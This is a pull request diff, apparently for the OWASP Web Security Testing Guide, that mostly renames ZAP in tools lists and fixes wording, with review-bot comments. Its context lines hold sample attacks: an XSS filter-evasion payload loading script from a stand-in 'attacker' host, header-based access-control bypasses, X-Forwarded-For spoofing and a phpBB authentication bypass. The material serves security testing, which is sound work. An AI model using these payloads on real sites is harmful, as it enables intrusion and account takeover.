Publish Latest 2023-11-24 #393

Merged
merged 1 commit into from
Nov 24, 2023
Original file line number Diff line number Diff line change
Expand Up @@ -88,7 +88,7 @@ Although most web servers manage search engine indexing via the `robots.txt` fil
<META name="robots" content="none">
```

The [Platform for Internet Content Selection (PICS)](https://www.w3.org/PICS/) and [Protocol for Web Description Resources (POWDER)](https://www.w3.org/2007/powder/) provide infrastructure for associating metadata with internet content.
The [Platform for Internet Content Selection (PICS)](https://www.w3.org/PICS/) and [Protocol for Web Description Resources (POWDER)](https://www.w3.org/2007/powder/) provide infrastructure for associating metadata with Internet content.

### Identifying JavaScript Code and Gathering JavaScript Files
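Review bot: the capitalization applied here conflicts with the one applied later in the same PR. This hunk changes "internet content" to "Internet content", while the hunk at `@@ -120,7 +120,7 @@` changes "blocking access from Internet" to "blocking access from internet". Pick one convention for the whole guide and apply it in both files in this PR, otherwise the next "Publish Latest" will flip one of them back.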

Expand Down Expand Up @@ -167,7 +167,7 @@ Consider a situation in which a redirect response is the result of an authentica
- Browser "view source" function
- Eyeballs
- [Curl](https://curl.haxx.se/)
- [Zaproxy](https://www.zaproxy.org)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
- [Burp Suite](https://portswigger.net/burp)
- [Waybackurls](https://github.com/tomnomnom/waybackurls)
- [Google Maps API Scanner](https://github.com/ozguralp/gmapsapiscanner/)
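Review bot: while this tools list is being touched for the ZAP rename, the entry `- [Curl](https://curl.haxx.se/)` should become `- [curl](https://curl.haxx.se/)`; the tool is spelled in lowercase and the other tools list in this PR (`- [curl](https://curl.haxx.se/)`) already does so, so the two lists now disagree on the same link text.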
Original file line number Diff line number Diff line change
Expand Up @@ -152,7 +152,7 @@ Having a variety of injection locations provides the attacker with chaining poss

## Tools

- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
- [Burp Suite](https://www.portswigger.net/burp/)
- [Fiddler](https://www.telerik.com/fiddler)
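Review bot: nothing in the PR title ("Publish Latest 2023-11-24") explains why the "OWASP" prefix is being dropped from "OWASP Zed Attack Proxy (ZAP)" in every tools list; a one-line rationale in the PR description would stop future contributors from "fixing" it back. Also, this list links Burp Suite as `https://www.portswigger.net/burp/` while the list in the previous file uses `https://portswigger.net/burp`; normalize the URL while these lists are open.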

Original file line number Diff line number Diff line change
Expand Up @@ -56,7 +56,7 @@ If the path `https://example.com/dashboard/none.js` is also opened by the user i

## Tools

- [OWASP Zed Attack Proxy](https://www.zaproxy.org)
- [Zed Attack Proxy](https://www.zaproxy.org)
- [Burp Suite](https://portswigger.net/burp)
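Review bot: this rename leaves the entry as `- [Zed Attack Proxy](https://www.zaproxy.org)` without the "(ZAP)" abbreviation, whereas the `@@ -95,7 +95,7 @@` hunk later in this PR changes "OWASP Zed Attack Proxy" to "Zed Attack Proxy (ZAP)". Use the form with the abbreviation everywhere so the tool is named identically across chapters.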

## Remediation
Original file line number Diff line number Diff line change
Expand Up @@ -195,7 +195,7 @@ Ensure default system accounts and test accounts are deleted prior to releasing

## Tools

- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
- [curl](https://curl.haxx.se/)
- [PERL](https://www.perl.org)
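Review bot: the adjacent context line `- [PERL](https://www.perl.org)` should read `- [Perl](https://www.perl.org)`; the language's name is "Perl" (it is not an acronym), and since this list is already being edited for the ZAP rename it is the right moment to fix it.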

Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,7 @@ While most applications require authentication to gain access to private informa

In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the application into thinking that the user is already authenticated. This can be accomplished either by modifying the given URL parameter, by manipulating the form, or by counterfeiting sessions.

Problems related to the authentication schema can be found at different stages of the software development life cycle (SDLC), like the design, development, and deployment phases:
Problems related to the authentication schema can be found at different stages of the software development lifecycle (SDLC), like the design, development, and deployment phases:

- In the design phase errors can include a wrong definition of application sections to be protected, the choice of not applying strong encryption protocols for securing the transmission of credentials, and many more.
- In the development phase errors can include the incorrect implementation of input validation functionality or not following the security best practices for the specific language.
Expand Down Expand Up @@ -103,7 +103,7 @@ The following figure shows that with a simple SQL injection attack, it is someti

If an attacker has been able to retrieve the application source code by exploiting a previously discovered vulnerability (e.g., directory traversal), or from a web repository (Open Source Applications), it could be possible to perform refined attacks against the implementation of the authentication process.

In the following example (PHPBB 2.0.12 - Authentication Bypass Vulnerability), at line 2 the `unserialize()` function parses a user supplied cookie and sets values inside the `$sessiondata` array. At line 7, the user's MD5 password hash stored inside the back end database (`$auto_login_key`) is compared to the one supplied (`$sessiondata['autologinid']`) by the user.
In the following example (PHPBB 2.0.12 - Authentication Bypass Vulnerability), at line 2 the `unserialize()` function parses a user supplied cookie and sets values inside the `$sessiondata` array. At line 7, the user's MD5 password hash stored inside the backend database (`$auto_login_key`) is compared to the one supplied (`$sessiondata['autologinid']`) by the user.

```php
1. if (isset($HTTP_COOKIE_VARS[$cookiename . '_sid'])) {
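Review bot: the touched sentence still names the project as "PHPBB 2.0.12"; the project spells it "phpBB", so correct the casing while changing "back end" to "backend" here. In the same sentence "user supplied cookie" should be hyphenated as "user-supplied cookie". Since the paragraph refers to "line 2" and "line 7" of the listing that follows, the numbered form of that code block must stay as is.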
Expand Down Expand Up @@ -135,7 +135,7 @@ Let's disassemble what we did in this string:
## Tools

- [WebGoat](https://owasp.org/www-project-webgoat/)
- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)

## References

Original file line number Diff line number Diff line change
Expand Up @@ -95,7 +95,7 @@ The methodology for testing is equivalent to the black-box case, as in both scen

## Tools

- [OWASP Zed Attack Proxy](https://www.zaproxy.org)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)

## References

Original file line number Diff line number Diff line change
Expand Up @@ -120,7 +120,7 @@ Some applications support non-standard headers such as `X-Original-URL` or `X-Re

This behavior can be leveraged in a situation in which the application is behind a component that applies access control restriction based on the request URL.

The kind of access control restriction based on the request URL can be, for example, blocking access from Internet to an administration console exposed on `/console` or `/admin`.
The kind of access control restriction based on the request URL can be, for example, blocking access from internet to an administration console exposed on `/console` or `/admin`.

To detect the support for the header `X-Original-URL` or `X-Rewrite-URL`, the following steps can be applied.
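Review bot: this hunk lowercases "Internet" to "internet" while the `@@ -88,7 +88,7 @@` hunk in the first file of this PR does the opposite ("internet content" to "Internet content"); settle on one spelling across the guide. The touched sentence is also missing an article: "blocking access from internet to an administration console" should be "blocking access from the internet to an administration console".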

Expand Down Expand Up @@ -152,7 +152,7 @@ X-Rewrite-URL: /donotexist2

If the response for either request contains markers that the resource was not found, this indicates that the application supports the special request headers. These markers may include the HTTP response status code 404, or a "resource not found" message in the response body.

Once the support for the header `X-Original-URL` or `X-Rewrite-URL` was validated then the tentative of bypass against the access control restriction can be leveraged by sending the expected request to the application but specifying a URL "allowed" by the front-end component as the main request URL and specifying the real target URL in the `X-Original-URL` or `X-Rewrite-URL` header depending on the one supported. If both are supported then try one after the other to verify for which header the bypass is effective.
Once the support for the header `X-Original-URL` or `X-Rewrite-URL` was validated then the tentative of bypass against the access control restriction can be leveraged by sending the expected request to the application but specifying a URL "allowed" by the frontend component as the main request URL and specifying the real target URL in the `X-Original-URL` or `X-Rewrite-URL` header depending on the one supported. If both are supported then try one after the other to verify for which header the bypass is effective.

#### 4. Other Headers to Consider
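Review bot: the sentence being edited here only swaps "front-end" for "frontend" but leaves the awkward "Once the support for the header ... was validated then the tentative of bypass ... can be leveraged", which is hard to parse. Suggest: "Once support for `X-Original-URL` or `X-Rewrite-URL` has been confirmed, attempt the bypass by sending the expected request with a URL 'allowed' by the frontend component as the main request URL and the real target URL in whichever of the two headers is supported." The final sentence about trying both headers in turn can stay.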

Expand Down Expand Up @@ -183,7 +183,7 @@ Employ the least privilege principles on the users, roles, and resources to ensu

## Tools

- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org/)
- [ZAP add-on: Access Control Testing](https://www.zaproxy.org/docs/desktop/addons/access-control-testing/)
- [Port Swigger Burp Suite](https://portswigger.net/burp)
- [Burp extension: AuthMatrix](https://github.com/SecurityInnovation/AuthMatrix/)
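Review bot: the context line `- [Port Swigger Burp Suite](https://portswigger.net/burp)` misspells the vendor; it is "PortSwigger" as one word. Every other tools list in this PR links it simply as `- [Burp Suite](...)`, so the cleanest fix is to use that form here too.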
Original file line number Diff line number Diff line change
Expand Up @@ -93,15 +93,15 @@ In this condition, verify that it is not possible to escalate privileges by modi

#### Manipulation of IP Address

Some websites limit access or count the number of failed login attempts based on IP address.
Some sites limit access or count the number of failed login attempts based on IP address.

For example:

```text
X-Forwarded-For: 8.1.1.1
```

In this case, if the website uses the value of `X-forwarded-For` as client IP address, tester may change the IP value of the `X-forwarded-For` HTTP header to workaround the IP source identification.
In this case, if the site uses the value of `X-forwarded-For` as client IP address, tester may change the IP value of the `X-forwarded-For` HTTP header to workaround the IP source identification.

### Testing for Vertical Bypassing Authorization Schema
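Review bot: the rewritten sentence keeps `X-forwarded-For` with inconsistent casing while the example block above it shows `X-Forwarded-For`; header names are case-insensitive, but the text should match the example. The same sentence also needs "the tester may change" and "to work around the IP source identification" (two words, as a verb). Separately, the example value `X-Forwarded-For: 8.1.1.1` is a publicly routable address; prefer an address from the RFC 5737 documentation ranges (for example 203.0.113.1) so readers do not copy a real third party's IP into their test traffic.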

Expand Down Expand Up @@ -175,7 +175,7 @@ The application will be considered vulnerable if any role other than administrat

### URL Traversal

Try to traverse the website and check if some of pages that may miss the authorization check.
Try to traverse the site and check if some of pages that may miss the authorization check.

For example:
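Review bot: the touched sentence "Try to traverse the site and check if some of pages that may miss the authorization check." is ungrammatical after the "website" to "site" swap. Suggest: "Traverse the site and check whether any pages are missing the authorization check."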

Expand All @@ -195,7 +195,7 @@ startswith(), endswith(), contains(), indexOf()

### Weak SessionID

Weak Session ID has algorithm may be vulnerable to brute Force attack. For example, one website is using `MD5(Password + UserID)` as sessionID. Then, testers may guess or generate the sessionID for other users.
Weak Session ID has algorithm may be vulnerable to brute Force attack. For example, one site is using `MD5(Password + UserID)` as sessionID. Then, testers may guess or generate the sessionID for other users.

## References
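Review bot: the line being edited, "Weak Session ID has algorithm may be vulnerable to brute Force attack.", does not parse; since it is already in the diff, fix it here. Suggest: "A session ID generated by a weak algorithm may be vulnerable to brute-force or prediction attacks. For example, if a site uses `MD5(Password + UserID)` as the session ID, testers may be able to guess or generate the session ID of other users." Also write "session ID" consistently rather than "sessionID".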

Expand All @@ -205,4 +205,4 @@ Weak Session ID has algorithm may be vulnerable to brute Force attack. For examp

## Tools

- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
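Review bot: in this chapter the `## Tools` section follows `## References`, whereas every other chapter touched in this PR (see the hunks around `@@ -135,7 +135,7 @@` and `@@ -95,7 +95,7 @@`) places `## Tools` before `## References`. Since this is the publish pass that normalizes the tools lists, move the section so the chapter structure matches the rest of the guide.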
Original file line number Diff line number Diff line change
Expand Up @@ -199,7 +199,7 @@ More information here: [Testing for cookies attributes](02-Testing_for_Cookies_A

## Tools

- [OWASP Zed Attack Proxy Project (ZAP)](https://www.zaproxy.org) - features a session token analysis mechanism.
- [Zed Attack Proxy Project (ZAP)](https://www.zaproxy.org) - features a session token analysis mechanism.
- [Burp Sequencer](https://portswigger.net/burp/documentation/desktop/tools/sequencer)
- [YEHG's JHijack](https://github.com/yehgdotnet/JHijack)
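Review bot: this hunk keeps "Project" in `- [Zed Attack Proxy Project (ZAP)](https://www.zaproxy.org)`, while the hunk at `@@ -136,7 +136,7 @@` in the next file drops it and uses `- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)`. Use the shorter form here as well; the trailing "- features a session token analysis mechanism." can stay.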

Original file line number Diff line number Diff line change
Expand Up @@ -89,7 +89,7 @@ The [`SameSite`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#SameS

##### Strict Value

The `Strict` value is the most restrictive usage of `SameSite`, allowing the browser to send the cookie only to first-party context without top-level navigation. In other words, the data associated with the cookie will only be sent on requests matching the current site shown on the browser URL bar. The cookie will not be sent on requests generated by third-party websites. This value is especially recommended for actions performed at the same domain. However, it can have some limitations with some session management systems negatively affecting the user navigation experience. Since the browser would not send the cookie on any requests generated from a third-party domain or email, the user would be required to sign in again even if they already have an authenticated session.
The `Strict` value is the most restrictive usage of `SameSite`, allowing the browser to send the cookie only to first-party context without top-level navigation. In other words, the data associated with the cookie will only be sent on requests matching the current site shown on the browser URL bar. The cookie will not be sent on requests generated by third-party sites. This value is especially recommended for actions performed at the same domain. However, it can have some limitations with some session management systems negatively affecting the user navigation experience. Since the browser would not send the cookie on any requests generated from a third-party domain or email, the user would be required to sign in again even if they already have an authenticated session.

##### Lax Value
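Review bot: the `Strict` description on the touched line is confusing as written: "send the cookie only to first-party context without top-level navigation" reads as if top-level navigation is the thing that is allowed. What distinguishes `Strict` from `Lax` is that `Strict` withholds the cookie even on a cross-site top-level navigation (a link from another site or from an email), which is exactly what the last sentence of the paragraph goes on to describe. Suggest: "allowing the browser to send the cookie only on same-site requests; it is withheld even on a top-level navigation that arrives from another site."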

Expand Down Expand Up @@ -136,7 +136,7 @@ Putting all this together, we can define the most secure cookie attribute config

### Intercepting Proxy

- [OWASP Zed Attack Proxy Project](https://www.zaproxy.org)
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org)
- [Web Proxy Burp Suite](https://portswigger.net)

### Browser Plug-in
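Review bot: the context line `- [Web Proxy Burp Suite](https://portswigger.net)` names the product differently and links a different URL from every other tools list in this PR (`- [Burp Suite](https://portswigger.net/burp)`); align it while the ZAP entry next to it is being rewritten.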
Original file line number Diff line number Diff line change
Expand Up @@ -174,7 +174,7 @@ Now suppose that developers of the target site implemented the following code to
Decoupling the above regular expression:

1. Check for a `<script`
2. Check for a " " (white space)
2. Check for a " " (whitespace)
3. Any character but the character `>` for one or more occurrences
4. Check for a `src`

Expand All @@ -184,7 +184,7 @@ This is useful for filtering expressions like `<script src="http://attacker/xss.
http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT>
```

This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim web site, `http://example/`.
This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim site, `http://example/`.

#### Example 7: HTTP Parameter Pollution (HPP)
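Review bot: the edited sentence should read "as if it were originating from the victim site" (subjunctive) rather than "as if it was originating". Also note the hyphenation of the vulnerability name varies across the hunks in this PR: "cross site scripting" here, "Cross-Site-Scripting" in the tools list below, and both "Cross-site Scripting" and "Cross Site Scripting" in the stored-XSS chapter's opening paragraph. Since these lines are already being touched, standardize on "cross-site scripting" (title case "Cross-Site Scripting" in headings).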

Expand Down Expand Up @@ -216,7 +216,7 @@ If source code is available (white-box testing), all variables received from use
- [XSS-Proxy](http://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool.
- [ratproxy](https://code.google.com/archive/p/ratproxy/) is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.
- [Burp Proxy](https://portswigger.net/burp/) is an interactive HTTP/S proxy server for attacking and testing web applications.
- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.

## References

Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,7 @@ tags: WSTG

Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios.

Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS.

This vulnerability can be used to conduct a number of browser-based attacks including:
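Review bot: the rewritten line still contains the grammar slip "this may also called second-order XSS"; it should be "this may also be called second-order XSS". The context line above it also mixes "Cross-site Scripting (XSS)" and "Cross Site Scripting" in one sentence; pick one form.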

Expand Down Expand Up @@ -52,7 +52,7 @@ The process for identifying stored XSS vulnerabilities is similar to the process

#### Input Forms

The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in:
The first step is to identify all points where user input is stored into the backend and then displayed by the application. Typical examples of stored user input can be found in:

- User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc.
- Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later
Expand Down Expand Up @@ -168,12 +168,12 @@ Blind Cross-site Scripting is a form of stored XSS. It generally occurs when the

Gray-box testing is similar to black-box testing. In gray-box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester.

Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended:
Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the backend system. The following steps are recommended:

- Use front-end application and enter input with special/invalid characters
- Use frontend application and enter input with special/invalid characters
- Analyze application response(s)
- Identify presence of input validation controls
- Access back-end system and check if input is stored and how it is stored
- Access backend system and check if input is stored and how it is stored
- Analyze source code and understand how stored input is rendered by the application

If source code is available (as in white-box testing), all variables used in input forms should be analyzed. In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests.
Expand All @@ -197,7 +197,7 @@ The following table summarizes some special variables and functions to look at w
- [XSS-Proxy](http://xss-proxy.sourceforge.net/) is an advanced Cross-Site-Scripting (XSS) attack tool.
- [Burp Proxy](https://portswigger.net/burp/) is an interactive HTTP/S proxy server for attacking and testing web applications.
- [XSS Assistant](https://www.greasespot.net/) Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.
- [OWASP Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.
- [Zed Attack Proxy (ZAP)](https://www.zaproxy.org) is an interactive HTTP/S proxy server for attacking and testing web applications with a built-in scanner.
- [XSS Hunter Portable](https://github.com/mandatoryprogrammer/xsshunter) XSS Hunter finds all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS.

## References
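Review bot: the context line `- [XSS Assistant](https://www.greasespot.net/) Greasemonkey script that allow users to easily test any web application for cross-site-scripting flaws.` has a subject-verb error ("allows") and the double-hyphenated "cross-site-scripting", which matches neither spelling used elsewhere in this PR; fix both while the neighboring ZAP entry is being edited.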